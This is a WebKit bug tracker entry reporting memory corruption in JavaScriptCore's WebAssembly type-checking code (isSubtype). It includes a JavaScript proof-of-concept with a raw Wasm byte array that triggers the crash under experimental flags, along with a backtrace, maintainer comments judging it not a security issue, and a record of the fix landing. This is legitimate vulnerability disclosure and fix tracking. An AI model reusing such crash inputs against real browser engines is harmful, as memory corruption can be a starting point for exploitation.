254412 – [WASM] Memory Corruption in JSC::Wasm::isSubtype

RESOLVED FIXED 254412

[WASM] Memory Corruption in JSC::Wasm::isSubtype

https://bugs.webkit.org/show_bug.cgi?id=254412

Summary [WASM] Memory Corruption in JSC::Wasm::isSubtype

CAO ZONG

Reported 2023-03-24 06:26:02 PDT

Commit: cebd0f9727d7493fbbea4ebf321799bc0152642e Build: Release Flag: --useSinglePassBBQJIT=true --useWebAssemblyTypedFunctionReferences=true --useWebAssemblyGC=true Poc: ``` var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,222,128,128,128,0,5,80,0,95,4,124,0,112,0,126,0,126,0,80,0,96,3,127,127,127,1,127,96,0,0,80,0,96,1,107,1,15,107,0,107,0,125,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,126,80,0,96,15,107,0,107,0,125,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,107,0,126,1,127,3,130,128,128,128,0,1,1,4,133,128,128,128,0,1,112,1,1,8,5,132,128,128,128,0,1,1,16,32,13,131,128,128,128,0,1,0,2,7,136,128,128,128,0,1,4,109,97,105,110,0,0,9,139,128,128,128,0,1,6,0,65,0,11,112,1,210,0,11,10,179,132,128,128,0,1,176,4,0,210,0,65,212,0,253,15,65,226,0,253,109,253,126,253,126,253,126,253,126,253,195,1,4,3,26,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,67,0,0,0,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,2,107,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,11,65,226,196,137,147,6,253,15,253,126,65,226,196,137,3,253,15,253,195,1,253,109,253,29,0,5,26,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,67,0,0,0,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,68,0,0,0,0,0,0,0,0,208,112,66,0,66,0,251,7,0,66,0,11,2,4,26,26,26,26,26,26,26,26,26,26,26,26,26,26,26,65,0,11,11]); var wasm_module = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_module); var f = wasm_instance.exports.main; f(); ``` Backtrace: #0 0x0000555556b8e4dc in JSC::Wasm::TypeDefinition::unroll() const () #1 0x0000555556b8e936 in JSC::Wasm::TypeDefinition::expand() const () #2 0x0000555556a3c2a3 in JSC::Wasm::isSubtype(JSC::Wasm::Type, JSC::Wasm::Type) () #3 0x0000555556b0253e in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::unify(JSC::Wasm::LLIntGenerator::ControlType const&) () #4 0x0000555556af0095 in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parseExpression() () #5 0x0000555556ae825b in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parseBody() () #6 0x0000555556ae309f in JSC::Wasm::FunctionParser<JSC::Wasm::LLIntGenerator>::parse() () #7 0x0000555556ad1f72 in JSC::Wasm::parseAndCompileBytecode(unsigned char const*, unsigned long, JSC::Wasm::TypeDefinition const&, JSC::Wasm::ModuleInformation&, unsigned int) () #8 0x0000555556adfceb in JSC::Wasm::LLIntPlan::compileFunction(unsigned int) () #9 0x0000555556acddf0 in JSC::Wasm::EntryPlan::compileFunctions(JSC::Wasm::Plan::CompilationEffort) () #10 0x0000555556b95272 in JSC::Wasm::Worklist::Thread::work() () #11 0x0000555556c4afa3 in WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call() () #12 0x0000555556c6c1ef in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) () #13 0x0000555556cc71d6 in WTF::wtfThreadEntryPoint(void*) () #14 0x00007ffff5fd9609 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0 #15 0x00007ffff5ba6133 in clone () from /lib/x86_64-linux-gnu/libc.so.6

Attachments
Add attachment proposed patch, testcase, etc.

Radar WebKit Bug Importer

Comment 1 2023-03-24 06:26:12 PDT

<rdar://problem/107184256>

Yusuke Suzuki

Comment 2 2023-03-24 11:59:19 PDT

> --useWebAssemblyTypedFunctionReferences=true This is not implemented fully & not enabled. So, this is not a security issue.

Yusuke Suzuki

Comment 3 2023-03-24 11:59:42 PDT

Also, --useWebAssemblyGC=true is not implemented fully and not enabled.

Asumu Takikawa

Comment 4 2024-01-26 16:00:53 PST

Pull request: https://github.com/WebKit/WebKit/pull/23334

EWS

Comment 5 2024-01-30 16:35:40 PST

Committed 273794@main (7b11aad047b2): <https://commits.webkit.org/273794@main> Reviewed commits have been landed. Closing PR #23334 and removing active labels.

Note You need to log in before you can comment on or make changes to this bug.

Status RESOLVED

Resolution FIXED

Priority P2

Severity Normal

Classification Unclassified

Version WebKit Nightly Build

Hardware Unspecified

OS Unspecified

Product WebKit

Component JavaScriptCore

Assignee

Asumu Takikawa

Reported

2023-03-24 06:26 PDT

Modified

2024-01-30 16:35 PST History

CC List

5 users Show

URL

Keywords InRadar

Depends on

Blocks

247394

Dependencies

tree graph